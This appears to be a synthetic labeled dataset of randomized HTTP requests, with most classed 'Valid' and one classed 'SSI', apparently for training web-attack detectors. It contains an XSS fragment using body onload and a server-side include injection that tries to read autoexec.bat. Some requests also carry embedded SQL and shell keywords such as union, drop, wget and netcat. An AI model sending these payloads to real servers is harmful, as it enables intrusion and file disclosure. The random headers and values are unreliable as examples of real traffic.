Warning: 645 11.179.105.218 "macfsr3roaxezThtw" "Sat, 20 Jan 07 14:10:36 GMT"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tde6h=<body   onload = "     [alert ('rlrty');] "    >

End - Id: 46831
Start - Id: 16403
class: Valid
GET /a9_VdR/akT9NqeUZIluE-P/eomtzlet7salhaha/kf9aiX8GX/ewroE0tn1einhipysgt/tN-ak1va3iilQUFNI8/3QHGnHJR__0h5iD.asp? HTTP/1.0
Host: www.Tdehnoe.be
Connection: scw9lerw
Accept: image/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: eHuyai-tNsdBtr, t5-olw, Hu1eA-rOznt, yb-taejn
Cache-Control: min-fresh=6
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="92"
Date: Tue, 07 Jul 09 05:18:34 UTC
ETag: W/"CT-tqGbM0OAI8Es"
Expect: 100-continue
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: *
If-None-Match: "aUTotrWjaPQDHG0"
If-Range: Fri, 25 Sep 09 02:20:52 CET
Max-Forwards: 6441
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM aU5nZWlhaG5vdGR1c2E0aE4wc3RpZXJyaG5ubmU3aWU=
Range: 9-3931
Referer: http://www.rm0isnd.gov/doetbay7.mspx
TE: deflate,deflate,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/9.4 (X11; U; Open BSD i386 2.5; wz-me; rv:5.4.3) Gecko/51503069
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 0.0 www.iostcoUh.htm
Transfer-Encoding: dicrs
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16403
Start - Id: 4651
class: Valid
PUT /X3winntmail/r5uJkaQJ0yZD/obr/iEjhNfGLfMPR3Z4/hck5M93bQ9c@/oza/kz6ifNsdirldemo.cfm? HTTP/1.0
Content-Length: 98
Content-Language: Ueai,cFlarr
Content-Encoding: deflate
Content-Location: http://www.aLolzcia.com/ldeuill/uhet/soieebYl.php4
Content-MD5: dGh4ZGFzUHNzOVVuaU5oYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Aug 09 06:06:51 GMT
Last-Modified: Thu, 13 Jan 05 22:17:12 GMT
Host: www.seyoyt.ch:80
Connection: keep-alive
Accept: application/*;q=0.2, image/png;q=0.3
Accept-Charset: us-ascii;q=0.2, x-mac-hebrew;q=0.6, windows-1252, gb2312, euc-tw
Accept-Encoding: identity;q=0.3, compress, gzip;q=0.6, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 125.192.198.244
Cookie: Do1anaal=8ta
Cookie2: $Version="65"
Date: Mon, 11 Jan 10 06:27:26 CET
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 2detqky
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Mon, 26 Jun 06 24:04:08 CET
If-Unmodified-Since: Wed, 22 Dec 04 14:49:46 CET
If-Match: *
If-None-Match: "Up9.2TNEDaAPxve"
If-Range: Thu, 21 Apr 05 17:54:35 UTC
Max-Forwards: 0050
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: NTLM dGJzb2wxaExlMXR1b3V5N3NpcnJkc2V0b3JFZHZpbTA=
Range: -2870,095-8
Referer: http://dpobtWrB.com/hsnr/btTdmi.js
TE: trailers
Trailer: Authorization
User-Agent: fSOpuEMu8 http://www.odxe.org
UA-CPU: 68000
UA-Disp: 0704,6679,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0964x700
Via: 9.3 235.234.112.131, 1.3 www.5orrIta.js, 7.0 49.227.139.147
Transfer-Encoding: compress
Upgrade: 4fZfWy/9.8, wdrsia/5.8, 9ie/8.3
Warning: 861 www.4hnca.jpeg "7noh" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i2u6tmztee=+&HyXWWTW==hmahttpN%t$+i&tp3=eXaQ8a&ecmk=SaedbdNo]5aelikee@&tT7=rhenshhan

End - Id: 4651
Start - Id: 11993
class: Valid
GET /VgiWensajef1e/6rrenEb0mdlolreaR/nfFrD2INx/ancit/uEE--n.aVIUGyGZw/namS_.js? HTTP/1.1
Host: www.eOr7tNeePd.de
Connection: ootcoto
Accept: image/gif;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.0, compress;q=0.0, gzip;q=0.5
Accept-Language: *
Cache-Control: max-age=727
Client-ip: 201.224.46.9
Cookie: rcqaaagchivNM=paRrihs5nme
Cookie2: $Version="042"
Date: Fri, 09 Apr 10 13:02:23 GMT
ETag: "azk_rN20wtoPDiQA8P"
Expect: tucTehl
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Tue, 27 Nov 07 01:51:52 UTC
If-Unmodified-Since: Fri, 27 Feb 04 12:14:49 CET
If-Match: "xMW0st63L3-kMmVRZk"
If-None-Match: *
If-Range: Sun, 26 Mar 06 07:22:34 CET
Max-Forwards: 4
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Digest uri=http://lSed2ms.gov/5edm7s.swf
Range: 9-,78403-
Referer: /oirth6/etvFr/siwe/ehr7r.htm
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 7.7; a6-eh; rv:2.8.3) Gecko/52080982
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: 3.4 www.msNHway.tiff, ricea/7.6 www.dnmtrr6.png
Transfer-Encoding: gzip
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 718 www.9arOwt.png:2 "keM3trpoeeiose" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11993
Start - Id: 8648
class: Valid
GET /dllntUril/ikJwU@ibn/seei/oattp0@k/nSJ_75IkcHml/dc9Fhv-mDw/h42nR/hWxtaL40@CsP/i_d/Njstdin-WJ.3K2group by3.cgi? HTTP/1.1
Host: www.qhuehr9e6E.gov
Connection: grtcou
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate, gzip;q=0.7, gzip, deflate
Accept-Language: *;q=0.8
Cache-Control: max-age=4
Client-ip: 251.65.203.9
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="7"
Date: Sun, 16 Dec 07 07:29:03 GMT
ETag: "8vrFUpBbSL_gbSY"
Expect: 100-continue
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Wed, 07 Jan 04 18:56:06 CET
If-Unmodified-Since: Sun, 14 May 06 22:15:52 GMT
If-Match: *
If-None-Match: "qJuhsmkid_EZwUsNez1"
If-Range: Sun, 02 Jan 05 21:41:01 UTC
Max-Forwards: 1
MIME-Version: 4.8
Pragma: n=aaerNyii
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: NTLM ZWdpcnd3bXM4b29vc2VlN2x1aFN0ZzVlMjJsMWl0aHR1Mm1PZnVudGhhZXJy
Range: -766,58-986789
Referer: /aSses1t.msf
TE: trailers
Trailer: Host
User-Agent: Mozilla/3.1 (compatible; MSIE 5.0; Solaris; 8uTrlan; v3sihe)
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8393x485
Via: HTTP/8.7 119.202.255.84
Transfer-Encoding: identity
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8648
Start - Id: 18907
class: Valid
GET /nfinoceAsea1vk/onitrnu29/KQHM_QGz1@BP-v/vPizqscpt/5zvi4U/gfdi7qo7oiosktaImg/sz0WTLOiWR9Og/isdidhflte/HqW/tHr-Yp8V_5quDc3/4AUithrr0ts/1@wZG_5G3szdmQT.php?@FJk4E=s9aNEkLC-aD&oOAcapet=dtN&mqdih=2216440&mod6xf=664947 HTTP/1.0
Host: 80.253.12.224:80
Connection: keep-alive
Accept: application/zip;q=0.3, audio/*, video/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: enuhumns-tswm, telem-xeddrc
Cache-Control: no-store
Client-ip: 13.243.7.64
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="0"
Date: Wed, 11 Apr 07 01:35:59 UTC
ETag: W/"@vQhswfe2aziBUOAQ"
Expect: leet=odiaciA;rke1x
From: sAoSt@vajrs.st
If-Modified-Since: Sun, 31 Oct 04 24:08:23 CET
If-Unmodified-Since: Fri, 02 Jan 09 09:02:49 UTC
If-Match: "a@b2WkLAFKSQTaWK"
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: Sat, 29 Oct 05 10:37:15 GMT
Max-Forwards: 82
MIME-Version: 9.7
Pragma: avd='tncbbwi'
Proxy-Authorization: Digest nonce
Authorization: Basic bGJKczp0ZHRl
Range: 3104-33,76-
Referer: /ghQo/irhf/na91/uwA4eun.tar.gz
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: qoaris/4.2.5
UA-CPU: Sparc
UA-Disp: 7305,2751,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: 0.3 www.i4ll.shtml, 7.4 125.66.122.21, 0.2 www.shrE.shtml
Transfer-Encoding: gzip
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 463833630
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18907
Start - Id: 25476
class: Valid
GET /h6EBsJoYw7JHoewR/ewRdWG0OKjXkO/ZFHshutdownnwNGt4mjselectU/oaxl2lWetZcbi/LVE2QOqh/tow6no2s0boropt/9m1SObgqVALwW/m1oatmpd9eSft7oagsiw/moototdjgpferAn.jpeg?ET4eiw70=5121&oasueo=lhscfrohupdatesdo&es=eEmeta+nph-&eo0daans=dorrai%5Drn1hsr&lexqjtsaem=rynigrsrctdsrni&ie=500&FNasbarazr0ioh=pu&cmdtm2D1efnsnd=8&hts=dufskidreuu9psc HTTP/1.0
Host: 140.70.241.148
Connection: keep-alive
Accept: text/*;q=0.5
Accept-Charset: windows-1258;q=0.7, x-mac-chinesesimp, macintosh
Accept-Encoding: compress;q=0.3, deflate, identity, identity, identity
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 13.208.175.187
Cookie: qbfvhruncyjqyen=tcsweenaiMt;LfTN=c:thdibodypeftptsjbpomail19
Cookie2: $Version="27"
Date: Thu, 13 Jul 06 07:04:29 GMT
ETag: "Zr0CXlnpdR@_3wXdsGVK"
Expect: 7htnlto=itOcer;gfiiit=neaulo
From: aol8LiS@eneda.cz
If-Modified-Since: Thu, 22 Feb 07 23:22:26 GMT
If-Unmodified-Since: Thu, 13 Oct 05 07:48:04 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 May 08 04:00:10 GMT
Max-Forwards: 77
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: gfieE dser=du7ueaeb
Authorization: Basic TlJ0YWE6ZjBxdGRlaQ==
Range: -0,-242148
Referer: /teusc5tg.pl
TE: chunked;q=0.6
Trailer: Accept
User-Agent: xfWerepcchronie
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: 8.3 www.4ita2icE.css, HTTP/6.1 140.194.178.195, dgncm/3.1 www.inidieem.htm
Transfer-Encoding: gzip
Upgrade: beumb/2.2, f5l/6.8
Warning: 898 81.55.160.68 "e9az1gc0lmr7ohaclob" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25476
Start - Id: 33223
class: Valid
POST /dPGNs7/reNi2utuJml/sahx7hrys8yst/tahgadrhv4/ectdtcMipasarI/nIPN/6@7.nPn48Oq9gapo7w/B8Uu/nowis2w/cmnnEiSk883roe/h@h3dM-swlD3MzvBEMN.asmx? HTTP/1.0
Content-Length: 14
Content-Language: 2ihsiies
Content-Encoding: compress
Content-Location: /NlrIe4tl.fgf
Content-MD5: bW9pYnp1YmRlc3Nzdzljcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 May 06 04:46:57 GMT
Last-Modified: Thu, 18 May 06 21:35:32 UTC
Host: 35.221.243.148:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.6, deflate;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.54.182.74
Cookie: hnai=86;7are5nagtah=unioni;RQqWFM=5968081;mochaa5.Q=979962;opt=elinkitRHktwp-t
Cookie2: $Version="315"
Date: Fri, 22 Oct 04 05:09:21 GMT
ETag: "pZoWtQw5tsmwPrt"
Expect: zhpnsnbp=t0or;egei=clnf1
From: 9nma9s@Escfl.biz
If-Modified-Since: Sun, 13 May 07 11:16:16 UTC
If-Unmodified-Since: Thu, 12 Nov 09 21:07:49 CET
If-Match: "JxOWUBJQR9Jlt@9.ucd"
If-None-Match: "-Qvv97SuQ7R@GsBji0"
If-Range: *
Max-Forwards: 78
MIME-Version: 5.0
Pragma: ns8ri=asiran4i
Proxy-Authorization: s2weid eddheoea=tmaa
Authorization: Digest username="ataz"
Range: -352533,78-491
Referer: /Ni5r/uhrit.png
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/1.6 (compatible; Konqueror/9.8; Windows NT; aOel; aphrhEots; nsoh9)
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 334x7223
Via: eai5p/7.3 64.194.125.37:54, 3.0 www.heeenifl.js
Transfer-Encoding: oEi84d; nIena=iiesNzMr
Upgrade: eia/6.1, dRehf6/3.4, ungss/9.9, faHsI8/4.3
Warning: 136 163.36.250.216 "merp" "Sun, 19 Nov 06 07:32:24 CET"
X-Forwarded-For: 132.37.200.89
X-Serial-Number: 979942
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ktou4cOhowo0=m

End - Id: 33223
Start - Id: 7586
class: Valid
POST /zobjtrbJbrutc8/rNkE88SpeQ/cKKhlO/bsGZA055MvHinsertuWdrop/4ZtqaQIbIjUGT-PnKaU1/tRz_EJi2xwZbYJ/ecInpo/ig2AC_3ED6IgwHMhqnTx/AruoPetitooiu4j/nIu.asp? HTTP/1.0
Content-Length: 32
Content-Language: jyrga,E
Content-Encoding: gzip
Content-Location: /airsc9A/oesa4sbs.jpeg
Content-MD5: bWl3Y2NjZVV1bnh0dHZpTA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jul 04 07:32:16 UTC
Last-Modified: Sat, 18 Oct 08 08:31:08 UTC
Host: www.noftS.uk
Connection: yjmc20s
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: rdreaiiE-NuaNtha;q=0.6, leXec-yo, sh-ltr1;q=0.5, mke5aeb-gsmaacc
Cache-Control: max-age=528
Client-ip: 202.177.178.10
Cookie: itqiz=733;Cea46is2=3180
Cookie2: $Version="58"
Date: Fri, 07 Apr 06 13:56:45 GMT
ETag: "ITG_FEan-J.7RCq"
Expect: uohn=cmnystid
From: 0ke0@2ergsrmep.it
If-Modified-Since: Fri, 23 May 08 08:08:36 CET
If-Unmodified-Since: Mon, 14 Jun 04 08:46:49 UTC
If-Match: "8.NijZkgw-aaL@NLY"
If-None-Match: "AW7s5FCJysAsAOZFM"
If-Range: Sun, 09 Oct 05 02:11:56 CET
Max-Forwards: 40
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic ZGl0NWRuZTpkaXNhZnRzaQ==
Authorization: Digest response="0ADdb2bbeA343D7961AcF5f32CE2B7eB"
Range: 8515-
Referer: http://tmrx.ch/SIsMtc4.sh
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (compatible; Konqueror/0.7; Solaris; robeo; edntuien0)
UA-CPU: Sparc
UA-Disp: 504,612,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 449x1634
Via: HTTP/9.0 43.152.133.84, n26N/8.9 www.mo2ees.jpg, 9.1 146.154.180.152
Transfer-Encoding: deflate
Upgrade: Trcl/0.4, Iktrb/8.6, ydcebx/8.7, rfe/6.1
Warning: 990 www.kpmht.gif "roigoeiiehg" 
X-Forwarded-For: 43.133.9.20
X-Serial-Number: 6700173
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

msereBdruter7=5&tsryfhic2=nnians

End - Id: 7586
Start - Id: 25926
class: Valid
GET /4n_telnetlA/aebxUjretgg3iimleot.pl?2y=39743&g9Tf-94kgd1V=94601&kno=ns&usr97I=ivbscriptwsamp&es=l5tncdaeiadubody9eftsod&iGMAw@kQqnode=ir%5C0emb&rqrIre=moz34&aurcaclhge3=ozA7e5rj&pwgetunionGQT=315066&lechrzyrwfo=24766215&deqiizObssoyeDa=2lm HTTP/1.1
Host: www.idlkrn.uk
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=33
Client-ip: 151.64.233.90
Cookie: hwtFNeril3ts6=ulzaoalcete;rjeEl=UlrabdmIinnrwqcm;hhesonat=04Avoeteuehdblsdog
Cookie2: $Version="10"
Date: Sat, 02 Feb 08 03:41:45 GMT
ETag: "ZrLxJWW4Lfsbyxp1kd"
Expect: Usri
From: pOyls@mejt.gov
If-Modified-Since: Thu, 07 Jun 07 13:59:07 GMT
If-Unmodified-Since: Wed, 27 Jun 07 10:39:21 UTC
If-Match: *
If-None-Match: "3wtyaVFrABLiNhi"
If-Range: Fri, 19 Feb 10 23:48:11 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic cm1lYTpvZWVoQQ==
Authorization: Digest nonce
Range: -1909,0060-494,6-
Referer: /ssoeeg8/rhfoT.css
TE: deflate;q=0.9,trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 5.2; aO-nt; rv:4.0.6) Gecko/63751430
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: HTTP/0.1 www.hfehao.tiff:0744
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 177.96.24.239
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25926
Start - Id: 33190
class: Valid
PUT /ineOCpssCiNzaIT/eS4fA._qYhLo-iR01/irTJ-/COx2@/uahV0o77oiiteNesb/1gttctiec/VGkprocessing-instructionMS8E35K3I.php3? HTTP/1.1
Content-Length: 138
Content-Language: arxel,eei,ePsni
Content-Encoding: gzip
Content-Location: /leUya/strtTe/te5e/8elnem/fndsmn.mpg
Content-MD5: bG9uZWVUeWhkaEVjZE1lag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 04 05:17:16 GMT
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: 1.21.38.254
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 18.214.52.39
Cookie: lnxytesg=623793;j2f=nwou;iNEiceoAh=bEDE2E;neeavw=3849558
Cookie2: $Version="05"
Date: Sat, 29 Nov 08 10:57:18 GMT
ETag: "cuNfd9lkCo0c0_RAeqT"
Expect: fttc=bojaii
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Tue, 16 Feb 10 12:00:25 CET
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: "ff1wYxeBymNNO_ndQ4@"
If-None-Match: "0xIGopzh1sYof1ov"
If-Range: Thu, 23 Dec 04 14:52:25 GMT
Max-Forwards: 7841
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: sce5tA raoi=cstt
Range: 8-21126,9-397638
Referer: http://www.ahea8E.net/eneel/NemL.htm
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: s@mWDmIzZ http://www.reL8jdz.fr
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: 7.0 255.226.40.56, HTTP/5.2 www.eilto.html
Transfer-Encoding: compress
Upgrade: blYO/9.0, dN8w/2.7, Ooa0/5.1, NcTat/8.3, alwi/9.7
Warning: 605 165.118.208.207:59007 "stw4t" 
X-Forwarded-For: 184.36.249.222
X-Serial-Number: 0421946796861302632
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

hontaEplky4r=mrs?&uneasif=oensaqdnuozuid&eoeteaSstnaha=oad&a5djre=1&AnCrLjHJ=aeiakadAGptrA&Ee.Musr7http=one4lH&l7zbSc=8&Oth@U0OZ=8419954

End - Id: 33190
Start - Id: 13401
class: Valid
GET /t2xhj@JqRE/mw3VRFoNE7HzSpb/ys9lruqtrsmTedefd/oqTaZt1bt8aU7Fl8C/.dropOchild5fd/bh2temlatc9cnnfLitac.cfm?ddspL=%7CmdocumentolocationWijdw1systemn&Ni=042182&racfJeand=6nan&KjN_0TqFz8Xu=Nt%3C%3Ceie%5D%24&Duhintto=841817&alEosmcoF=eGKGxDDhgF9 HTTP/1.0
Host: 233.23.174.170
Connection: oHmlSjla
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.32.190.111
Cookie: p33ii=6607875042
Cookie2: $Version="835"
Date: Sun, 01 Jun 08 11:34:54 CET
ETag: W/"2rEb9PyIEKZaRygZz8G"
Expect: iohuym2n
From: eLfi@jwo4ip.biz
If-Modified-Since: Thu, 20 Jan 05 19:31:30 GMT
If-Unmodified-Since: Fri, 29 Jan 10 14:04:24 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Apr 10 07:48:08 CET
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic MlNtcmR3bmc6YWx3enQ=
Authorization: cox0 nsasnim=3htbe
Range: -95
Referer: http://ednV.ch/rsapao80/eeun/ilacsozn/Eeueoe.mdb
TE: trailers,chunked,gzip;q=0.5
Trailer: Upgrade
User-Agent: eeimaO/8.6.4.5.5
UA-CPU: StrongARM
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 191x7499
Via: 4.3 www.yaucoom.shtml:05000, 3.5 250.80.152.247, 4.7 230.187.255.189
Transfer-Encoding: identity
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 246 159.73.154.161 "purtdea5Lon" "Sat, 12 Mar 05 05:48:54 UTC"
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 92696306703
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13401
Start - Id: 34577
class: Valid
PUT /dwzsifnylaos/Decee8.exe? HTTP/1.1
Content-Length: 62
Content-Language: f5g
Content-Encoding: deflate
Content-Location: /sfn6rit/g7eofin/dMtalo/ihiSywt/oVttue.asmx
Content-MD5: dDVzcnNuZ25sbjBkNGZsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Sep 06 14:16:05 GMT
Last-Modified: Sun, 26 Apr 09 11:44:24 GMT
Host: 200.197.160.218
Connection: close
Accept: text/xml;q=0.2, video/*
Accept-Charset: utf-8;q=0.6, x-mac-korean, windows-1257;q=0.0, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: ej='sji5n'
Client-ip: 33.195.206.96
Cookie: hndnrtDktscMcd=594;wtoAeoeuite5oae=Ieo0dorfwinntn;-pptmpjwW8T.=??n3?;-IYl@fZfwnetcatAx=sIvBNIKuZr;aqea=sE T;lAohaTuaeb=o;systemt
Cookie2: $Version="5"
Date: Wed, 25 Jul 07 10:28:45 CET
ETag: "1.XK6i-vaqTnZpgTMb"
Expect: 100-continue
From: anode@toacdDp.be
If-Modified-Since: Thu, 24 Jul 08 01:16:53 GMT
If-Unmodified-Since: Sun, 04 Mar 07 10:20:00 UTC
If-Match: "aca-nNACHRSvBLeL@U"
If-None-Match: *
If-Range: Mon, 08 Nov 04 10:15:17 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: 7ys='tw0'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Basic Z3R0QTpsM21vb3p0
Range: 1867-,-2727
Referer: /tpye/o5dssa.msf
TE: deflate,trailers,trailers
Trailer: Date
User-Agent: Mozilla/6.1 (compatible; MSIE 9.3; Win 9x; cmdxt9EaIe)
UA-CPU: PowerPC
UA-Disp: 061,177,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 512x9817
Via: 0.1 www.w0if.tiff, 5.2 www.Ayetln.html
Transfer-Encoding: deflate
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 50.44.4.152
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OetoO0qaGieS=ec&ip3nc=mEp.&3n2zd=<d&d3snnvarob=a7maagpoocsra

End - Id: 34577
Start - Id: 40621
class: SSI
GET /@5/bustoekuhr.pl?od=n+v9a&n7dwxseeevi=cJqYxx6_&nomubxostqNt3=%3C%21--+++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&9l0Chjc374=td0&oUzuhl=5m&L4WOK=85889501&NRpJ4Smchild@3L=msadboris&uerhr=cbaeasaioGndyinc&Tmouec=7263&Detiinditnce6=cf&oo=iM8bm9&vZMPfOBy6=+h+o HTTP/1.0
Host: 167.28.217.27
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ssar-xV0u, ixwbayt-e9o;q=0.4, hOdcc-nrpbin, ht-sdh, qwbsrul-tiaen1b6
Cache-Control: max-age=039
Client-ip: 74.254.15.74
Cookie: 7G9ytgaHw=320458;xnelsno7x=i:rtsoete dhijoemochahe;ItharduicR=qxsigiliae;s2slEneinid=9;9honhxeehisrjn=y;sodsns=802181539
Cookie2: $Version="48"
Date: Fri, 26 Nov 04 08:12:39 CET
ETag: "BSYbTuX7wGz5Vkk"
Expect: 100-continue
From: tcb6@st75oiFP0e.net
If-Unmodified-Since: Tue, 25 Jan 05 17:32:55 CET
If-Match: "hiv8GOeXfHXt3lr.3wy"
If-None-Match: *
If-Range: *
Max-Forwards: 309
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 5dny iidu4=nicettyt
Authorization: Digest realm
Range: 656012-5
Referer: http://www.aws1ebl.uk/Rhpttqst/Clni/xus11koi.exe
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/4.8 (compatible; MSIE 2.4; Open BSD i386; lfmsld1do)
UA-Disp: 959,926,32
Via: FTP/1.3 7.4.108.62
Transfer-Encoding: deflate
Upgrade: 43bua/6.8, mrble/6.7, ntta/4.0
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 5234187897202701
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40621
Start - Id: 11808
class: Valid
GET /roceosot9wrdyoydnil.shtml?caeoNsnn=eh9CTsom&Ig0F_YyC=nz&deeua2ecc=cxb&hcwhptftnlDz6r=paIltbey9nt&Ergvr3OS4=tRpR8re&othtlOBtoTwso=s0lRQbRoV&wrtbjh6aebab=9&tvhyit=e+ebEg&Itr6rlneltereee=hsupdate7e&dwdToaTin=cZAqsQ7aXUzu&ofsaM9ta4f=oqTY HTTP/1.1
Host: 158.134.232.105:14
Connection: close
Accept: */*;q=0.1
